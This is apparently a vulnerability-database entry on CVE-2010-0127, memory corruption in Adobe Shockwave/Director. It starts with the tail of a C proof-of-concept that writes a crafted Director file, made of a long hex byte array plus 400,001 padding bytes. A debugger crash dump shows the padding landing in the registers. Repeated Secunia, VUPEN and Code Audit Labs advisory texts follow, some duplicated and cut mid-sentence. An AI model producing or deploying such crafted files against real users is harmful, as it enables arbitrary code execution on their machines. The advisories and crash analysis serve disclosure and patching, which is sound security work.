0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x05,
0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0xFF, 0xFF, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x14, 0x00, 0x69,
0x06, 0x66, 0x6F, 0x72, 0x67, 0x65, 0x74, 0x06, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x06, 0x72,
0x65, 0x74, 0x75, 0x72, 0x6E, 0x0D, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x50, 0x72, 0x65, 0x73,
0x65, 0x6E, 0x74, 0x03, 0x6E, 0x65, 0x77, 0x08, 0x66, 0x69, 0x6C, 0x65, 0x4E, 0x61, 0x6D, 0x65,
0x05, 0x74, 0x69, 0x74, 0x6C, 0x65, 0x07, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x09, 0x73,
0x70, 0x72, 0x69, 0x74, 0x65, 0x54, 0x61, 0x62, 0x07, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74,
0x06, 0x73, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x06, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x07, 0x70,
0x69, 0x63, 0x74, 0x75, 0x72, 0x65, 0x09, 0x68, 0x65, 0x6C, 0x70, 0x54, 0x6F, 0x70, 0x69, 0x63,
0x17, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x44, 0x65, 0x73, 0x63, 0x72, 0x69, 0x70,
0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x61, 0x6D, 0x65, 0x06, 0x66, 0x6F,
0x72, 0x6D, 0x61, 0x74, 0x06, 0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x0A, 0x73, 0x74, 0x61, 0x72,
0x74, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x07, 0x69, 0x6E, 0x74, 0x65, 0x67, 0x65, 0x72, 0x08, 0x65,
0x6E, 0x64, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x09, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x4E, 0x75,
0x6D, 0x08, 0x65, 0x64, 0x69, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x07, 0x62, 0x6F, 0x6F, 0x6C, 0x65,
0x61, 0x6E, 0x06, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x05, 0x72, 0x61, 0x6E, 0x67, 0x65, 0x09,
0x66, 0x6F, 0x72, 0x65, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x09,
0x62, 0x61, 0x63, 0x6B, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x62, 0x6C, 0x65, 0x6E, 0x64, 0x03,
0x6D, 0x69, 0x6E, 0x03, 0x6D, 0x61, 0x78, 0x03, 0x69, 0x6E, 0x6B, 0x04, 0x6C, 0x6F, 0x63, 0x48,
0x04, 0x6C, 0x6F, 0x63, 0x56, 0x05, 0x77, 0x69, 0x64, 0x74, 0x68, 0x06, 0x68, 0x65, 0x69, 0x67,
0x68, 0x74, 0x08, 0x72, 0x6F, 0x74, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x05, 0x66, 0x6C, 0x6F, 0x61,
0x74, 0x04, 0x73, 0x6B, 0x65, 0x77, 0x05, 0x66, 0x6C, 0x69, 0x70, 0x48, 0x05, 0x66, 0x6C, 0x69,
0x70, 0x56, 0x06, 0x66, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x13, 0x69, 0x74, 0x65, 0x6D, 0x44, 0x65,
0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x6F,
0x74, 0x65, 0x04, 0x74, 0x79, 0x70, 0x65, 0x05, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x04, 0x74, 0x65,
0x78, 0x74, 0x04, 0x6C, 0x65, 0x66, 0x74, 0x03, 0x74, 0x6F, 0x70, 0x05, 0x72, 0x69, 0x67, 0x68,
0x74, 0x06, 0x62, 0x6F, 0x74, 0x74, 0x6F, 0x6D, 0x09, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x54,
0x61, 0x62, 0x06, 0x6E, 0x75, 0x6D, 0x62, 0x65, 0x72, 0x0A, 0x63, 0x61, 0x73, 0x74, 0x4C, 0x69,
0x62, 0x4E, 0x75, 0x6D, 0x0A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x54, 0x65, 0x78, 0x74, 0x07,
0x67, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x70, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x69, 0x6F, 0x6E,
0x44, 0x61, 0x74, 0x65, 0x04, 0x64, 0x61, 0x74, 0x65, 0x0C, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69,
0x65, 0x64, 0x44, 0x61, 0x74, 0x65, 0x0A, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42,
0x79, 0x08, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x0D, 0x70, 0x75, 0x72, 0x67, 0x65,
0x50, 0x72, 0x69, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x08, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65,
0x64, 0x06, 0x6C, 0x69, 0x6E, 0x6B, 0x65, 0x64, 0x06, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x64, 0x05,
0x6D, 0x65, 0x64, 0x69, 0x61, 0x09, 0x74, 0x68, 0x75, 0x6D, 0x62, 0x6E, 0x61, 0x69, 0x6C, 0x04,
0x73, 0x69, 0x7A, 0x65, 0x0A, 0x6D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x73, 0x69, 0x7A, 0x65, 0x0A,
0x6D, 0x65, 0x64, 0x69, 0x61, 0x52, 0x65, 0x61, 0x64, 0x79, 0x0C, 0x67, 0x72, 0x61, 0x70, 0x68,
0x69, 0x63, 0x50, 0x72, 0x6F, 0x70, 0x73, 0x06, 0x68, 0x69, 0x6C, 0x69, 0x74, 0x65, 0x08, 0x72,
0x65, 0x67, 0x50, 0x6F, 0x69, 0x6E, 0x74, 0x05, 0x70, 0x6F, 0x69, 0x6E, 0x74, 0x04, 0x72, 0x65,
0x63, 0x74, 0x05, 0x61, 0x62, 0x6F, 0x75, 0x74, 0x06, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x0A,
0x65, 0x64, 0x69, 0x74, 0x53, 0x63, 0x72, 0x69, 0x70, 0x74, 0x04, 0x65, 0x64, 0x69, 0x74, 0x09,
0x6E, 0x61, 0x6D, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x09, 0x61, 0x6C, 0x69, 0x67, 0x6E, 0x6D,
0x65, 0x6E, 0x74, 0x08, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x09, 0x73, 0x69, 0x7A,
0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x06, 0x62, 0x72, 0x6F, 0x77, 0x73, 0x65, 0x07, 0x6F, 0x70,
0x74, 0x69, 0x6F, 0x6E, 0x73, 0x0A, 0x70, 0x75, 0x72, 0x67, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C,
0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x07, 0x63, 0x72,
0x65, 0x61, 0x74, 0x65, 0x64, 0x0D, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x4C, 0x61,
0x62, 0x65, 0x6C, 0x0F, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42, 0x79, 0x4C, 0x61,
0x62, 0x65, 0x6C, 0x0D, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x4C, 0x61, 0x62, 0x65,
0x6C, 0x05, 0x66, 0x69, 0x65, 0x6C, 0x64, 0x06, 0x73, 0x63, 0x72, 0x6F, 0x6C, 0x6C, 0x08, 0x73,
0x68, 0x61, 0x70, 0x65, 0x54, 0x61, 0x62, 0x05, 0x73, 0x68, 0x61, 0x70, 0x65, 0x06, 0x66, 0x69,
0x6C, 0x6C, 0x65, 0x64, 0x09, 0x73, 0x68, 0x61, 0x70, 0x65, 0x54, 0x79, 0x70, 0x65, 0x04, 0x6F,
0x76, 0x61, 0x6C, 0x09, 0x72, 0x6F, 0x75, 0x6E, 0x64, 0x52, 0x65, 0x63, 0x74, 0x04, 0x6C, 0x69,
0x6E, 0x65, 0x08, 0x6C, 0x69, 0x6E, 0x65, 0x53, 0x69, 0x7A, 0x65, 0x0B, 0x67, 0x72, 0x61, 0x6E,
0x75, 0x6C, 0x61, 0x72, 0x69, 0x74, 0x79, 0x0D, 0x6C, 0x69, 0x6E, 0x65, 0x44, 0x69, 0x72, 0x65,
0x63, 0x74, 0x69, 0x6F, 0x6E, 0x07, 0x70, 0x61, 0x74, 0x74, 0x65, 0x72, 0x6E, 0x00, 0x20, 0x6C,
0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x46, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46,
0x57, 0x56, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x61,
0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x63,
0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x66, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E,
0x2F, 0x41, 0x00, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E, 0x2F, 0x41, 0x00, 0x4A, 0x43,
0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20,
0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x6C, 0x71, 0x77, 0x72, 0x6D, 0x5C, 0x44,
0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x41, 0x44, 0x4F, 0x42, 0x45, 0x20, 0x44, 0x49, 0x52,
0x45, 0x43, 0x54, 0x4F, 0x52, 0x20, 0x57, 0x4F, 0x52, 0x4B, 0x49, 0x4E, 0x47, 0x20, 0x56, 0x55,
0x4C, 0x4E, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x5A, 0x5C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x53,
0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0xFF, 0xFF, 0xFF, 0xFD, 0x00, 0x00,
0x00, 0x0C, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x8C, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00,
0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,
0x00, 0x8A, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x0E, 0x00, 0x30, 0x03, 0xEE,
0x00, 0x96, 0x00, 0x36, 0x00, 0x30, 0x01, 0x20, 0x10, 0x80, 0x00, 0xFF, 0x00, 0x01, 0x00, 0x01,
0x00, 0x00, 0x00, 0x03, 0x00, 0x97, 0x00, 0x2E, 0x00, 0x87, 0x00, 0xA4, 0x30, 0x00, 0x02, 0x00,
0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x01, 0x36, 0x82, 0x00,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0F, 0xE1, 0xFD, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x54,
0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4C, 0x54, 0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43,
0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x24, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00,
0xDD, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xF8, 0x00, 0xEF, 0xFF, 0xF8, 0x00, 0xFA, 0x00,
0xEB, 0xFF, 0xFA, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFC, 0x00, 0xE7, 0xFF, 0xFC, 0x00,
0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0x01, 0x00, 0x00, 0xE1,
0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00,
0xDF, 0xFF, 0x00, 0x00, 0xDE, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00,
0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00,
0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00,
0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFC, 0x00, 0xE7, 0xFF,
0xFC, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFA, 0x00, 0xEB, 0xFF, 0xFA, 0x00, 0xF8, 0x00,
0xEF, 0xFF, 0xF8, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00,
0xDD, 0x00, 0xDD, 0x00 //8756
};
int main(int argc, char *argv[])
{
char buff[409008];
char junk[400001];
memset(junk,0x41,400001);
memcpy(buff,shocks,strlen(shocks));
memcpy(buff+strlen(shocks),junk,strlen(junk));
memcpy(buff+strlen(shocks)+strlen(junk),shocke,strlen(shocke));
fp = fopen(FFORMAT,"wb");
if(fp==NULL)
{
perror ("\nUweeepa! Can't open file.\n");
}
fwrite(buff,1,sizeof(buff),fp);
fclose(fp);
printf("\nFile %s successfully created!\n\a", FFORMAT);
return 0;
}
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. User interaction is required
in that a user must visit a malicious web site. When a malicious value is used
during a memory dereference a possible 4-byte memory overwrite may
occur. Exploitation can lead to remote system compromise under the
credentials of the currently logged in user.
About Code Audit Labs:
=====================
Code Audit Labs is department of VulnHunt company which provide a
professional security testing products / services / security consulting
and training ,we sincerely hope we can help your procudes to improve code
quality and safety.
WebSite http://www.VulnHunt.com ( online soon)
.
These vulnerabilities are caused due to memory corruptions, array indexing,
heap overflows and invalid pointers when processing malformed files, which
could be exploited by attackers to execute arbitrary code by tricking a user
into visiting a specially crafted web page.
III. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
Discovered by Chaouki Bekrar and Sebastien Renaud of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1280
IX. DISCLOSURE TIMELINE
-----------------------------
2010-02-24 - Vendor notified
2010-02-24 - Vendor response
2010-03-02 - Status update received
2010-05-07 - Status update received
2010-05-12 - Coordinated public Disclosure
| VAR-201005-0050 | CVE-2010-0127 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted FFFFFF45h Shockwave 3D blocks in a Shockwave file. Adobe Shockwave Player is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player.
======================================================================
6) Time Table
02/03/2010 - Vendor notified.
02/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0127 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
